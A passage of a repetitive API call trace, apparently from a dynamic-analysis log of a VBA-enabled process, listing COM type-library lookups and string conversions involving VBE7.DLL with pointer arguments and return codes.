lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.514] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.514] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.514] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.515] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.515] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.515] IUnknown:Release (This=0x665ba50) returned 0xd [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.515] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.515] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.515] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.515] IUnknown:Release (This=0x665ba50) returned 0xd [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.515] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.515] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.515] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.515] IUnknown:Release (This=0x665ba50) returned 0xd [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.515] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.516] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.516] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.516] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.516] IUnknown:Release (This=0x665ba50) returned 0xd [0069.516] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.516] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.516] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.516] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.516] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.516] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.516] IUnknown:Release (This=0x665ba50) returned 0xd [0069.516] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.516] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.516] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.516] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.517] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.517] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.517] IUnknown:Release (This=0x665ba50) returned 0xd [0069.517] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.517] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.517] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.517] IMalloc:Realloc (This=0x7fefec05380, pv=0xaffde90, cb=0x1010) returned 0xaffde90 [0069.517] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.517] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.517] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.517] IUnknown:Release (This=0x665ba50) returned 0xd [0069.517] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.517] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.517] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.517] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.517] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.517] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.517] IUnknown:Release (This=0x665ba50) returned 0xd [0069.517] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.518] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.518] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.518] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.518] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.518] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.518] IUnknown:Release (This=0x665ba50) returned 0xd [0069.518] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.518] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.518] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.518] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.518] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.518] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.518] IUnknown:Release (This=0x665ba50) returned 0xd [0069.518] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.518] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.518] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.518] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.518] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.518] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.518] IUnknown:Release (This=0x665ba50) returned 0xd [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.519] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.519] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.519] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.519] IUnknown:Release (This=0x665ba50) returned 0xd [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.519] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.519] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.519] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.519] IUnknown:Release (This=0x665ba50) returned 0xd [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.519] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.519] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.520] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.520] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.520] IUnknown:Release (This=0x665ba50) returned 0xd [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.520] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.520] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.520] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.520] IUnknown:Release (This=0x665ba50) returned 0xd [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.520] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.520] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.520] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.520] IUnknown:Release (This=0x665ba50) returned 0xd [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.520] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, 